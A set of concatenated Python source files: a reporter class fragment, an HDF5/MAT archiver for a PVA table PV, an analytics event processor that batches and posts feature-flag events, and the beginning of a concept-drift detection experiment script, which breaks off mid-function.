delete_after_upload=delete_after_upload, **kwargs)
_, url = ev.get_target_full_upload_uri(upload_uri or self._storage_uri, self._metrics.storage_key_prefix)
# Hack: if the url doesn't start with http(s), plotly will not be able to show it,
# so we register the link under images instead of plots
if not url.startswith('http') and not self._offline_mode:
return self.report_image_and_upload(title=title, series=series, iter=iter, path=path, image=matrix,
upload_uri=upload_uri, max_image_history=max_image_history)
self._report(ev)
plotly_dict = create_image_plot(
image_src=url,
title=title + '/' + series,
width=640,
height=int(640*float(height or 480)/float(width or 640)),
)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series),
plot=plotly_dict,
iter=iter,
)
@classmethod
def _normalize_name(cls, name):
return name
def __exit__(self, exc_type, exc_val, exc_tb):
# don't flush in case an exception was raised
if not exc_type:
self.flush()
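# --- Hedged usage sketch (editor's addition, not part of the original module) ---
# The reporting methods above all funnel through _report()/flush(). Assuming a
# reporter instance has already been constructed elsewhere (its constructor is not
# shown in this excerpt), typical usage might look roughly like the lines below;
# the variable name `reporter` and the metric/series names are illustrative only.
#
#     reporter.report_scalar(title='loss', series='train', value=0.271, iter=10)
#     reporter.report_histogram(title='gradients', series='layer1',
#                                histogram=np.random.rand(3, 5), iter=10)
#     reporter.flush()  # push any buffered events to the backend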
|
h5tablewriter.py
|
#!/usr/bin/env python
from __future__ import division, print_function, unicode_literals
import time
import signal
import sys
import os
import shutil
import platform
import errno
import select
import logging
import threading
try:
from ConfigParser import SafeConfigParser as _ConfigParser, NoOptionError
class ConfigParser(_ConfigParser):
# enable dict-like access as with py3
class SectionProxy(object):
def __init__(self, conf, sect):
self.conf, self.sect = conf, sect
def __getitem__(self, key):
try:
return self.conf.get(self.sect, key)
except NoOptionError:
raise KeyError(key)
def get(self, key, defval=None):
try:
return self.conf.get(self.sect, key)
except NoOptionError:
return defval
def __getitem__(self, section):
if section!='DEFAULT' and not self.has_section(section):
raise KeyError(section)
return self.SectionProxy(self, section)
except ImportError:
from configparser import SafeConfigParser as ConfigParser
import numpy
import h5py
from p4p.client.thread import Context, Disconnected
_log = logging.getLogger(__name__)
ref_dtype = h5py.special_dtype(ref=h5py.Reference)
def getargs():
from argparse import ArgumentParser
A = ArgumentParser(description="""Poor man's BSAS archiver.
Run with *TBL PV name, and prefix for output files.
Switches to a new file on SIGHUP or SIGUSR1.
Graceful exit on SIGINT.
Writes HDF5 files which attempt to be MAT 7.3 compatible.
""")
A.add_argument('conf', metavar='FILE', help='configuration file')
A.add_argument('--section', metavar='NAME', default='DEFAULT', help='configure file section to use')
A.add_argument('-v', '--verbose', action='store_const', const=logging.DEBUG, default=logging.INFO)
A.add_argument('-q', '--quiet', action='store_const', const=logging.WARN, dest='verbose')
A.add_argument('-C', '--check', action='store_true', default=False, help="Exit after reading configuration file")
return A.parse_args()
def matheader(fname):
"""The magic header used to distinguish Matlab .mat files from
everyday ordinary run of the mill HDF5 files.
https://pythonhosted.org/hdf5storage/storage_format.html#matlab-file-header
"""
I = {}
I['major'], I['minor'], I['micro'] = sys.version_info[:3]
H = 'MATLAB 7.3 MAT-file, Platform: CPython %(major)d.%(minor)d.%(micro)d, Created on: %%a %%b %%d %%H:%%M:%%S %%Y HDF5 schema 1.00 .'%I
H = time.strftime(H).encode('ascii')
assert len(H)<(128-12), repr(H)
H = H + b' '*(128-12-len(H)) + b'\0\0\0\0\0\0\0\0\x00\x02\x49\x4d'
assert len(H)==128, repr(H)
# we are writing into the userblock, which is assumed to be at least 128 bytes long.
# we ensure this below when creating new files.
with open(fname, 'r+b') as F:
F.write(H)
# values for the magic 'MATLAB_class' attribute on datasets
_mat_class = {
numpy.dtype('f4'): numpy.string_('single'),
numpy.dtype('f8'): numpy.string_('double'),
numpy.dtype('u1'): numpy.string_('uint8'),
numpy.dtype('u2'): numpy.string_('uint16'),
numpy.dtype('u4'): numpy.string_('uint32'),
numpy.dtype('u8'): numpy.string_('uint64'),
numpy.dtype('i1'): numpy.string_('int8'),
numpy.dtype('i2'): numpy.string_('int16'),
numpy.dtype('i4'): numpy.string_('int32'),
numpy.dtype('i8'): numpy.string_('int64'),
# TODO: bool and some string types
}
class TableWriter(object):
context = Context('pva', unwrap=False)
def __init__(self, conf, wakeup=None, check=False):
self._wakeup = wakeup
# pull out mandatory config items now
self.pv = conf['tablePV']
self.ftemplate = conf['outfile'] # passed through time.strftime()
self.ftemp = conf.get('scratch', '/tmp/bsas_%s.h5'%self.pv)
self.temp_limit = int( float(conf.get('temp_limit', '0'))*(2**30) ) # in bytes
if self.temp_limit <= 0:
stat = os.statvfs(os.path.dirname(self.ftemp))
# by default, limit ourself to a fraction of the FS capacity
self.temp_limit = int(stat.f_frsize*stat.f_blocks*0.25)
self.temp_period = float(conf.get('temp_period', '60'))*60.0 # in sec.
self.group = conf.get('file_group', '/')
if check:
raise KeyboardInterrupt()
# guards open HDF5 file, and our attributes.
# serialize main thread and PVA worker
self.lock = threading.Lock()
self.nextref = 0
self.initial = True
self.prevstart = None
self.F, self.G = None, None # h5py.File and h5py.Group
self._migrate = None
_log.info("Create subscription")
self.S = self.context.monitor(self.pv, self._update, request='field()record[pipeline=True]', notify_disconnect=True)
def close(self): # self.lock is locked
_log.info("Close subscription")
self.S.close()
_log.info("Final flush")
self.flush(force=True)
if self._migrate is not None:
_log.info("Wait for final migration")
self._migrate.join()
_log.info("final migration complete")
def _update(self, val):
# called from PVA worker only
start, prevstart = time.time(), self.prevstart
self.prevstart = start
_log.debug('Update')
with self.lock:
self.__update(val)
if prevstart is None:
return
end = time.time()
interval = start-prevstart # >= the server update interval (based on previous update)
dT = end-start # our processing time for this update
if dT >= interval*0.75:
_log.warn("Processing time %.2f approaches threshold %.2f", dT, interval)
else:
_log.info("Processing time %.2f, threshold %.2f", dT, interval)
def __update(self, val): # self.lock is locked
if isinstance(val, Disconnected):
_log.warn("Table PV disconnect")
self.initial = True
self.flush()
return
elif self.initial:
_log.warn("Table PV (re)connect")
self.initial = False
return # ignore initial update
elif self.F is None:
self.open() # lazy (re)open on first update
for fld, lbl in zip(val.value.keys(), val.labels):
V = val.value[fld]
if isinstance(V, numpy.ndarray):
new, = V.shape
try:
D = self.G[fld]
except KeyError:
D = self.G.create_dataset(fld, dtype=V.dtype,
shape=(0, 1), chunks=None, maxshape=(None, 1),
shuffle=True, compression='gzip')
D.attrs['label'] = lbl
D.attrs['MATLAB_class'] = _mat_class[V.dtype]
cur, _one = D.shape
D.resize((cur+new, 1))
D[cur:, 0] = V # copy
elif isinstance(V, list): # union[]
# store as cell array
try:
D = self.G[fld]
except KeyError:
D = self.G.create_dataset(fld, dtype=ref_dtype,
shape=(0, 1), chunks=None, maxshape=(None, 1))
D.attrs['label'] = lbl
D.attrs['MATLAB_class'] = numpy.string_("cell")
refs = []
_refs_ = self.G.require_group('#refs#')
_path = numpy.string_(_refs_.name.encode('ascii'))
# placeholder for empty cells
try:
null = _refs_['null']
except KeyError:
null = _refs_.create_dataset('null', data=numpy.asarray([0,1], dtype='u8'))
null.attrs['MATLAB_class'] = numpy.string_('double')
null.attrs['H5PATH'] = _path
null.attrs['MATLAB_empty'] = numpy.asarray(1, dtype='u1')
for img in V:
if img is None:
refs.append(null.ref)
else:
dset = _refs_.create_dataset('cellval%d'%self.nextref, data=img,
shuffle=True, compression='gzip', compression_opts=9)
dset.attrs['MATLAB_class'] = _mat_class[img.dtype]
dset.attrs['H5PATH'] = _path
refs.append(dset.ref)
self.nextref += 1
cur, _one = D.shape
D.resize((cur+new, 1))
D[cur:, 0] = refs
self.F.flush() # flush this update to disk
self.flush()
def flush(self, force=False): # self.lock is locked
if self.F is not None:
self.F.flush()
age = time.time()-self.F_time
size = os.stat(self.ftemp).st_size
if not force and age < self.temp_period and size < self.temp_limit:
_log.info('Skip rotate, too new (%.2f < %.2f) and too small (%d < %d)', age, self.temp_period, size, self.temp_limit)
return
_log.info('Close and rotate')
self.F.close()
self.F, self.G = None, None
if os.path.isfile(self.ftemp):
if self._migrate is not None:
# We only pipeline a single migration.
# If this hasn't completed, then we stall until it has.
self._migrate.join(0.01)
if self._migrate.is_alive():
_log.warn("Flush stalls waiting for previous migration to complete. Prepare for data loss!")
self._migrate.join()
self._migrate = None
_log.info("Previous migration complete")
_log.info("Starting migration of '%s'", self.ftemp)
stage2 = self.ftemp+'.tmp'
if os.path.isfile(stage2):
_log.error("Overwriting debris '%s' !", stage2)
os.rename(self.ftemp, stage2)
self._migrate = threading.Thread(name='BSAS Migration', target=self._movefile, args=(stage2,))
self._migrate.start()
def _movefile(self, stage2):
# called from migration thread only
finalpath = None
try:
start = time.time()
# expand template with last mod time (instead of current time)
mtime = os.stat(stage2).st_mtime
finalpath = time.strftime(self.ftemplate, time.gmtime(mtime)) # expand using UTC
if os.path.isfile(finalpath):
_log.error("Migration destination '%s' already exists. Prepare for data loss!")
os.remove(finalpath)
_log.info('Migrate %s -> %s', stage2, finalpath)
try:
os.makedirs(os.path.dirname(finalpath))
except OSError:
pass #if we failed, then the move will also fail
shutil.move(stage2, finalpath)
end = time.time()
_log.info("Migration of '%s' complete after %.2f sec", finalpath, end-start)
except:
_log.exception("Failure during Migration of '%s' -> '%s'", stage2, finalpath)
def open(self): # self.lock is locked
self.flush()
_log.info('Open "%s"', self.ftemp)
with h5py.File(self.ftemp, 'w-', userblock_size=512) as F: # error if already exists
assert F.userblock_size>=128, F.userblock_size
matheader(self.ftemp)
self.F = h5py.File(self.ftemp, 'r+') # error if not exists
self.F_time = time.time()
self.G = self.F.require_group(self.group)
self.nextref = 0
def __enter__(self):
return self
def __exit__(self, A,B,C):
with self.lock:
self.close()
class SigWake(object):
def __enter__(self):
self._R, self._W = os.pipe()
self.prevHUP = signal.signal(signal.SIGHUP, self._wake)
self.prevUSR1 = signal.signal(signal.SIGUSR1, self._wake)
return self
def __exit__(self, A,B,C):
signal.signal(signal.SIGHUP, self.prevHUP)
signal.signal(signal.SIGUSR1, self.prevUSR1)
os.close(self._R)
os.close(self._W)
def _wake(self, num, frame):
self.poke()
def poke(self):
os.write(self._W, b'!')  # must be bytes so this also works on Python 3
def wait(self, timeout=None):
try:
Rs, _Ws, _Es = select.select([self._R], [], [], timeout)
if self._R in Rs:
os.read(self._R, 1)
except select.error:
pass # assume EINTR
except OSError as e:
if e.errno!=errno.EINTR:
raise
signal.signal(signal.SIGHUP, self._wake)
signal.signal(signal.SIGUSR1, self._wake)
def set_proc_name(newname):
if platform.system()!='Linux':
_log.warn("Don't know how to set process name")
return
newname = newname[:15]
from ctypes import cdll, byref, create_string_buffer
libc = cdll.LoadLibrary(None)
buff = create_string_buffer(len(newname)+1)
buff.value = newname.encode('ascii')  # ctypes string buffers require bytes
libc.prctl(15, byref(buff), 0, 0, 0) # PR_SET_NAME=15 on Linux
def main(conf):
try:
with SigWake() as S:
with TableWriter(conf, check=args.check) as W:
_log.info("Running")
while True:
S.wait(W.temp_period/4.)
with W.lock:
W.flush()
except KeyboardInterrupt:
pass
_log.info("Done")
if __name__=='__main__':
# set process name to allow external tools like eg. logrotate
# to force us to start a new file.
# killall -s SIGUSR1 h5tablewriter
set_proc_name('h5tablewriter')
args = getargs()
conf = ConfigParser({
'PWD':os.path.dirname(args.conf),
'scratch':'/tmp/%(tablePV)s.h5',
})
with open(args.conf, 'r') as F:
conf.readfp(F)
logging.basicConfig(level=args.verbose)
main(conf[args.section])
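# --- Hedged example configuration (editor's addition, not part of the original) ---
# The keys read above are tablePV, outfile, scratch, temp_limit, temp_period and
# file_group. A minimal INI file might look like the sketch below; the PV name and
# paths are made up for illustration. Note that strftime placeholders in 'outfile'
# need doubled percent signs to survive ConfigParser interpolation.
#
#     [DEFAULT]
#     tablePV = SOME:TBL:PV
#     outfile = /data/bsas/%%Y%%m%%d/%%H%%M%%S.h5
#     scratch = /tmp/bsas_%(tablePV)s.h5
#     # rotate after ~2 GiB of scratch or 60 minutes, whichever comes first
#     temp_limit = 2
#     temp_period = 60
#     file_group = /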
|
event_processor.py
|
"""
Implementation details of the analytics event delivery component.
"""
# currently excluded from documentation - see docs/README.md
from calendar import timegm
from collections import namedtuple
from email.utils import parsedate
import errno
import json
from threading import Event, Lock, Thread
import time
import uuid
import queue
import urllib3
from ldclient.event_summarizer import EventSummarizer
from ldclient.fixed_thread_pool import FixedThreadPool
from ldclient.impl.http import _http_factory
from ldclient.lru_cache import SimpleLRUCache
from ldclient.user_filter import UserFilter
from ldclient.interfaces import EventProcessor
from ldclient.repeating_timer import RepeatingTimer
from ldclient.util import UnsuccessfulResponseException
from ldclient.util import log
from ldclient.util import check_if_error_is_recoverable_and_log, is_http_error_recoverable, stringify_attrs, throw_if_unsuccessful_response, _headers
from ldclient.diagnostics import create_diagnostic_init
__MAX_FLUSH_THREADS__ = 5
__CURRENT_EVENT_SCHEMA__ = 3
__USER_ATTRS_TO_STRINGIFY_FOR_EVENTS__ = [ "key", "secondary", "ip", "country", "email", "firstName", "lastName", "avatar", "name" ]
EventProcessorMessage = namedtuple('EventProcessorMessage', ['type', 'param'])
class EventOutputFormatter:
def __init__(self, config):
self._inline_users = config.inline_users_in_events
self._user_filter = UserFilter(config)
def make_output_events(self, events, summary):
events_out = [ self.make_output_event(e) for e in events ]
if len(summary.counters) > 0:
events_out.append(self.make_summary_event(summary))
return events_out
def make_output_event(self, e):
kind = e['kind']
if kind == 'feature':
is_debug = e.get('debug')
out = {
'kind': 'debug' if is_debug else 'feature',
'creationDate': e['creationDate'],
'key': e['key'],
'version': e.get('version'),
'variation': e.get('variation'),
'value': e.get('value'),
'default': e.get('default'),
'prereqOf': e.get('prereqOf')
}
if self._inline_users or is_debug:
out['user'] = self._process_user(e)
else:
out['userKey'] = self._get_userkey(e)
if e.get('reason'):
out['reason'] = e.get('reason')
if e.get('contextKind'):
out['contextKind'] = e.get('contextKind')
return out
elif kind == 'identify':
return {
'kind': 'identify',
'creationDate': e['creationDate'],
'key': self._get_userkey(e),
'user': self._process_user(e)
}
elif kind == 'custom':
out = {
'kind': 'custom',
'creationDate': e['creationDate'],
'key': e['key']
}
if self._inline_users:
out['user'] = self._process_user(e)
else:
out['userKey'] = self._get_userkey(e)
if e.get('data') is not None:
out['data'] = e['data']
if e.get('metricValue') is not None:
out['metricValue'] = e['metricValue']
if e.get('contextKind'):
out['contextKind'] = e.get('contextKind')
return out
elif kind == 'index':
return {
'kind': 'index',
'creationDate': e['creationDate'],
'user': self._process_user(e)
}
else:
return e
"""
Transform summarizer data into the format used for the event payload.
"""
def make_summary_event(self, summary):
flags_out = dict()
for ckey, cval in summary.counters.items():
flag_key, variation, version = ckey
flag_data = flags_out.get(flag_key)
if flag_data is None:
flag_data = { 'default': cval['default'], 'counters': [] }
flags_out[flag_key] = flag_data
counter = {
'count': cval['count'],
'value': cval['value']
}
if variation is not None:
counter['variation'] = variation
if version is None:
counter['unknown'] = True
else:
counter['version'] = version
flag_data['counters'].append(counter)
return {
'kind': 'summary',
'startDate': summary.start_date,
'endDate': summary.end_date,
'features': flags_out
}
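# Hedged illustration (editor's addition): for a single counter keyed by
# ('my-flag', 1, 7) with count=3, value=True and default=False, the method above
# would produce roughly the following payload; the timestamps are made up.
#
#     {
#         'kind': 'summary',
#         'startDate': 1500000000000,
#         'endDate': 1500000001000,
#         'features': {
#             'my-flag': {
#                 'default': False,
#                 'counters': [ {'count': 3, 'value': True, 'variation': 1, 'version': 7} ]
#             }
#         }
#     }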
def _process_user(self, event):
filtered = self._user_filter.filter_user_props(event['user'])
return stringify_attrs(filtered, __USER_ATTRS_TO_STRINGIFY_FOR_EVENTS__)
def _get_userkey(self, event):
return str(event['user'].get('key'))
class EventPayloadSendTask:
def __init__(self, http, config, formatter, payload, response_fn):
self._http = http
self._config = config
self._formatter = formatter
self._payload = payload
self._response_fn = response_fn
def run(self):
try:
output_events = self._formatter.make_output_events(self._payload.events, self._payload.summary)
resp = self._do_send(output_events)
except Exception:
log.warning(
'Unhandled exception in event processor. Analytics events were not processed.',
exc_info=True)
def _do_send(self, output_events):
# noinspection PyBroadException
try:
json_body = json.dumps(output_events)
log.debug('Sending events payload: ' + json_body)
payload_id = str(uuid.uuid4())
r = _post_events_with_retry(
self._http,
self._config,
self._config.events_uri,
payload_id,
json_body,
"%d events" % len(self._payload.events)
)
if r:
self._response_fn(r)
return r
except Exception as e:
log.warning(
'Unhandled exception in event processor. Analytics events were not processed. [%s]', e)
class DiagnosticEventSendTask:
def __init__(self, http, config, event_body):
self._http = http
self._config = config
self._event_body = event_body
def run(self):
# noinspection PyBroadException
try:
json_body = json.dumps(self._event_body)
log.debug('Sending diagnostic event: ' + json_body)
_post_events_with_retry(
self._http,
self._config,
self._config.events_base_uri + '/diagnostic',
None,
json_body,
"diagnostic event"
)
except Exception as e:
log.warning(
'Unhandled exception in event processor. Diagnostic event was not sent. [%s]', e)
FlushPayload = namedtuple('FlushPayload', ['events', 'summary'])
class EventBuffer:
def __init__(self, capacity):
self._capacity = capacity
self._events = []
self._summarizer = EventSummarizer()
self._exceeded_capacity = False
self._dropped_events = 0
def add_event(self, event):
if len(self._events) >= self._capacity:
self._dropped_events += 1
if not self._exceeded_capacity:
log.warning("Exceeded event queue capacity. Increase capacity to avoid dropping events.")
self._exceeded_capacity = True
else:
self._events.append(event)
self._exceeded_capacity = False
def add_to_summary(self, event):
self._summarizer.summarize_event(event)
def get_and_clear_dropped_count(self):
dropped_count = self._dropped_events
self._dropped_events = 0
return dropped_count
def get_payload(self):
return FlushPayload(self._events, self._summarizer.snapshot())
def clear(self):
self._events = []
self._summarizer.clear()
class EventDispatcher:
def __init__(self, inbox, config, http_client, diagnostic_accumulator=None):
self._inbox = inbox
self._config = config
self._http = _http_factory(config).create_pool_manager(1, config.events_uri) if http_client is None else http_client
self._close_http = (http_client is None) # so we know whether to close it later
self._disabled = False
self._outbox = EventBuffer(config.events_max_pending)
self._user_keys = SimpleLRUCache(config.user_keys_capacity)
self._formatter = EventOutputFormatter(config)
self._last_known_past_time = 0
self._deduplicated_users = 0
self._diagnostic_accumulator = None if config.diagnostic_opt_out else diagnostic_accumulator
self._flush_workers = FixedThreadPool(__MAX_FLUSH_THREADS__, "ldclient.flush")
self._diagnostic_flush_workers = None if self._diagnostic_accumulator is None else FixedThreadPool(1, "ldclient.diag_flush")
if self._diagnostic_accumulator is not None:
init_event = create_diagnostic_init(self._diagnostic_accumulator.data_since_date,
self._diagnostic_accumulator.diagnostic_id,
config)
task = DiagnosticEventSendTask(self._http, self._config, init_event)
self._diagnostic_flush_workers.execute(task.run)
self._main_thread = Thread(target=self._run_main_loop)
self._main_thread.daemon = True
self._main_thread.start()
def _run_main_loop(self):
log.info("Starting event processor")
while True:
try:
message = self._inbox.get(block=True)
if message.type == 'event':
self._process_event(message.param)
elif message.type == 'flush':
self._trigger_flush()
elif message.type == 'flush_users':
self._user_keys.clear()
elif message.type == 'diagnostic':
self._send_and_reset_diagnostics()
elif message.type == 'test_sync':
self._flush_workers.wait()
if self._diagnostic_accumulator is not None:
self._diagnostic_flush_workers.wait()
message.param.set()
elif message.type == 'stop':
self._do_shutdown()
message.param.set()
return
except Exception:
log.error('Unhandled exception in event processor', exc_info=True)
def _process_event(self, event):
if self._disabled:
return
# Always record the event in the summarizer.
self._outbox.add_to_summary(event)
# Decide whether to add the event to the payload. Feature events may be added twice, once for
# the event (if tracked) and once for debugging.
add_full_event = False
add_debug_event = False
add_index_event = False
if event['kind'] == "feature":
add_full_event = event.get('trackEvents')
add_debug_event = self._should_debug_event(event)
else:
add_full_event = True
# For each user we haven't seen before, we add an index event - unless this is already
# an identify event for that user.
if not (add_full_event and self._config.inline_users_in_events):
user = event.get('user')
if user and 'key' in user:
is_index_event = event['kind'] == 'identify'
already_seen = self.notice_user(user)
add_index_event = not is_index_event and not already_seen
if not is_index_event and already_seen:
self._deduplicated_users += 1
if add_index_event:
ie = { 'kind': 'index', 'creationDate': event['creationDate'], 'user': user }
self._outbox.add_event(ie)
if add_full_event:
self._outbox.add_event(event)
if add_debug_event:
debug_event = event.copy()
debug_event['debug'] = True
self._outbox.add_event(debug_event)
# Add to the set of users we've noticed, and return true if the user was already known to us.
def notice_user(self, user):
if user is None or 'key' not in user:
return False
key = user['key']
return self._user_keys.put(key, True)
def _should_debug_event(self, event):
debug_until = event.get('debugEventsUntilDate')
if debug_until is not None:
last_past = self._last_known_past_time
now = int(time.time() * 1000)
if debug_until > last_past and debug_until > now:
return True
return False
def _trigger_flush(self):
if self._disabled:
return
payload = self._outbox.get_payload()
if self._diagnostic_accumulator:
self._diagnostic_accumulator.record_events_in_batch(len(payload.events))
if len(payload.events) > 0 or len(payload.summary.counters) > 0:
task = EventPayloadSendTask(self._http, self._config, self._formatter, payload,
self._handle_response)
if self._flush_workers.execute(task.run):
# The events have been handed off to a flush worker; clear them from our buffer.
self._outbox.clear()
else:
# We're already at our limit of concurrent flushes; leave the events in the buffer.
pass
def _handle_response(self, r):
server_date_str = r.getheader('Date')
if server_date_str is not None:
server_date = parsedate(server_date_str)
if server_date is not None:
timestamp = int(timegm(server_date) * 1000)
self._last_known_past_time = timestamp
if r.status > 299 and not is_http_error_recoverable(r.status):
self._disabled = True
return
def _send_and_reset_diagnostics(self):
if self._diagnostic_accumulator is not None:
dropped_event_count = self._outbox.get_and_clear_dropped_count()
stats_event = self._diagnostic_accumulator.create_event_and_reset(dropped_event_count, self._deduplicated_users)
self._deduplicated_users = 0
task = DiagnosticEventSendTask(self._http, self._config, stats_event)
self._diagnostic_flush_workers.execute(task.run)
def _do_shutdown(self):
self._flush_workers.stop()
self._flush_workers.wait()
if self._close_http:
self._http.clear()
class DefaultEventProcessor(EventProcessor):
def __init__(self, config, http=None, dispatcher_class=None, diagnostic_accumulator=None):
self._inbox = queue.Queue(config.events_max_pending)
self._inbox_full = False
self._flush_timer = RepeatingTimer(config.flush_interval, self.flush)
self._users_flush_timer = RepeatingTimer(config.user_keys_flush_interval, self._flush_users)
self._flush_timer.start()
self._users_flush_timer.start()
if diagnostic_accumulator is not None:
self._diagnostic_event_timer = RepeatingTimer(config.diagnostic_recording_interval, self._send_diagnostic)
self._diagnostic_event_timer.start()
else:
self._diagnostic_event_timer = None
self._close_lock = Lock()
self._closed = False
(dispatcher_class or EventDispatcher)(self._inbox, config, http, diagnostic_accumulator)
def send_event(self, event):
event['creationDate'] = int(time.time() * 1000)
self._post_to_inbox(EventProcessorMessage('event', event))
def flush(self):
self._post_to_inbox(EventProcessorMessage('flush', None))
def stop(self):
with self._close_lock:
if self._closed:
return
self._closed = True
self._flush_timer.stop()
self._users_flush_timer.stop()
if self._diagnostic_event_timer:
self._diagnostic_event_timer.stop()
self.flush()
# Note that here we are not calling _post_to_inbox, because we *do* want to wait if the inbox
# is full; an orderly shutdown can't happen unless these messages are received.
self._post_message_and_wait('stop')
def _post_to_inbox(self, message):
try:
self._inbox.put(message, block=False)
except queue.Full:
if not self._inbox_full:
# possible race condition here, but it's of no real consequence - we'd just get an extra log line
self._inbox_full = True
log.warning("Events are being produced faster than they can be processed; some events will be dropped")
def _flush_users(self):
self._inbox.put(EventProcessorMessage('flush_users', None))
def _send_diagnostic(self):
self._inbox.put(EventProcessorMessage('diagnostic', None))
# Used only in tests
def _wait_until_inactive(self):
self._post_message_and_wait('test_sync')
def _post_message_and_wait(self, type):
reply = Event()
self._inbox.put(EventProcessorMessage(type, reply))
reply.wait()
# These magic methods allow use of the "with" block in tests
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.stop()
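# --- Hedged usage sketch (editor's addition, not part of the original module) ---
# Because of __enter__/__exit__ above, the processor can be driven from a test
# roughly as sketched below; `some_config` stands in for a real ldclient Config
# object and the event dict is illustrative only.
#
#     with DefaultEventProcessor(some_config) as ep:
#         ep.send_event({'kind': 'identify', 'user': {'key': 'user-1'}})
#         ep.flush()
#     # leaving the block calls stop(), which drains the inbox and shuts down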
def _post_events_with_retry(
http_client,
config,
uri,
payload_id,
body,
events_description
):
hdrs = _headers(config)
hdrs['Content-Type'] = 'application/json'
if payload_id:
hdrs['X-LaunchDarkly-Event-Schema'] = str(__CURRENT_EVENT_SCHEMA__)
hdrs['X-LaunchDarkly-Payload-ID'] = payload_id
can_retry = True
context = "posting %s" % events_description
while True:
next_action_message = "will retry" if can_retry else "some events were dropped"
try:
r = http_client.request(
'POST',
uri,
headers=hdrs,
body=body,
timeout=urllib3.Timeout(connect=config.http.connect_timeout, read=config.http.read_timeout),
retries=0
)
if r.status < 300:
return r
recoverable = check_if_error_is_recoverable_and_log(context, r.status, None, next_action_message)
if not recoverable:
return r
except Exception as e:
check_if_error_is_recoverable_and_log(context, None, str(e), next_action_message)
if not can_retry:
return None
can_retry = False
# fixed delay of 1 second for event retries
time.sleep(1)
|
main_experiments.py
|
import argparse
import copy
import json
import logging
import os
import shutil
import sys
import time
import warnings
from datetime import datetime
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import torch
import torch.multiprocessing as mp
import torch.nn as nn
from sklearn.datasets import make_classification, make_blobs
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from torch.utils.data import DataLoader, TensorDataset
from src.models.MLP import MetaMLP
from src.utils.constraint_module import CentroidLoss
from src.utils.drift_helper import detection_helper
from src.utils.global_var import OUTPATH, columns
from src.utils.induce_concept_drift import induce_drift, corrupt_drift
from src.utils.load_datasets import load_data
from src.utils.log_utils import StreamToLogger
from src.utils.plotting_utils import plot_embedding
from src.utils.saver import Saver, SaverSlave
from src.utils.utils import readable, predict, check_ziplen, remove_duplicates, linear_interp, train_model, \
evaluate_model
warnings.filterwarnings("ignore")
torch.backends.cudnn.benchmark = True
sns.set_style("whitegrid")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
######################################################################################################
def run(x, args, path, result_path):
print('Process PID:', os.getpid())
args.init_seed = x
df_run = single_experiment(args, path)
if os.path.exists(result_path):
df_run.to_csv(result_path, mode='a', sep=',', header=False, index=False)
else:
df_run.to_csv(result_path, mode='a', sep=',', header=True, index=False)
def parse_args():
parser = argparse.ArgumentParser(description='Concept drift detection experiments. '
'By default the constrained module is used.')
parser.add_argument('--dataset', type=str, default='RBF', choices=(
'fin_adult', 'fin_wine', 'fin_bank', 'fin_digits08', 'fin_digits17', 'fin_musk', 'fin_phis', 'phishing', 'spam',
'RBF', 'MovRBF'))
# Synthetic data parameters
parser.add_argument('--features', type=int, default=20)
parser.add_argument('--classes', type=int, default=4)
parser.add_argument('--informative', type=int, default=10)
parser.add_argument('--redundant', type=int, default=0)
parser.add_argument('--drift_features', type=str, default='top',
help='Which features to corrupt. Choices: top - bottom - list with features')
parser.add_argument('--drift_type', type=str, default='gradual', choices=('step', 'gradual'))
parser.add_argument('--drift_p', type=float, default=0.25, help='Percentage of features to corrupt')
parser.add_argument('--detectors', type=str, nargs='+',
default=['ZScore', 'IRQ', 'P_modified', 'EMA', 'HDDDM_Emb', 'HDDDM_Input', 'IKS_emb',
'DDM', 'EDDM', 'ADWIN'],
choices=(
'ZScore', 'IRQ', 'P_modified', 'EMA', 'HDDDM_Emb', 'HDDDM_Input', 'IKS_Input',
'IKS_emb_raw', 'IKS_emb', 'KSWIN_Emb', 'PH_Emb', 'PH_error', 'DDM', 'EDDM', 'ADWIN',
'MMD_Input', 'MMD_Emb', 'Chi_Input', 'Chi_Emb', 'LSD_Input', 'LSD_Emb', 'KS_Input',
'KS_Emb'), help='Available drift detectors')
parser.add_argument('--dyn_update', action='store_true', default=False, help='Drift statistic dynamic update')
parser.add_argument('--drift_history', type=int, nargs='+', default=[25, 50], help='Drift detection history size')
parser.add_argument('--drift_th', type=int, nargs='+', default=[10, 50], help='Drift detection threshold')
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--epochs', type=int, default=50)
parser.add_argument('--learning_rate', type=float, default=1e-3)
parser.add_argument('--hidden_activation', type=str, default='nn.ReLU()')
parser.add_argument('--unconstrained', action='store_true', default=False, help='Not use constrained module')
parser.add_argument('--momentum', type=float, default=0.9)
parser.add_argument('--normalization', type=str, default='none')
parser.add_argument('--dropout', type=float, default=0.25)
parser.add_argument('--l2penalty', type=float, default=0.001)
parser.add_argument('--num_workers', type=int, default=0, help='PyTorch dataloader worker. Set to 0 if debug.')
parser.add_argument('--init_seed', type=int, default=420, help='RNG seed. Typ. 42, 420, 1337, 0, 69.')
parser.add_argument('--n_runs', type=int, default=1, help='Number or runs')
parser.add_argument('--process', type=int, default=1, help='Number of parallel process. Single GPU.')
parser.add_argument('--neurons', nargs='+', type=int, default=[100, 50, 20])
parser.add_argument('--classifier_dim', type=int, default=20)
parser.add_argument('--embedding_size', type=int, default=3)
# Suppress terminal out
parser.add_argument('--disable_print', action='store_true', default=False)
parser.add_argument('--plt_loss', action='store_true', default=True)
parser.add_argument('--plt_embedding', action='store_true', default=False)
parser.add_argument('--plt_loss_hist', action='store_true', default=True)
parser.add_argument('--plt_cm', action='store_true', default=True)
parser.add_argument('--plt_recons', action='store_true', default=True)
parser.add_argument('--headless', action='store_true', default=False, help='Matplotlib backend')
# Add parameters for each particular network
args = parser.parse_args()
return args
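# --- Hedged example invocation (editor's addition) ---
# A typical run on the synthetic RBF stream with gradual drift and two parallel
# processes might look like the command below; the values are illustrative only.
#
#     python main_experiments.py --dataset RBF --drift_type gradual \
#         --drift_features top --drift_p 0.25 --n_runs 5 --process 2 --headless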
######################################################################################################
def load_corrupt_data(args):
# Loading data
if args.dataset == 'MovRBF':
# Blobs dataset with drift induced by moving centroids
X, y, centers = make_blobs(n_samples=2000, n_features=args.features, centers=args.classes, cluster_std=1.0,
return_centers=True)
x_test_, Y_test_, centers_end = make_blobs(n_samples=1000, n_features=args.features, centers=args.classes,
cluster_std=1.0,
return_centers=True)
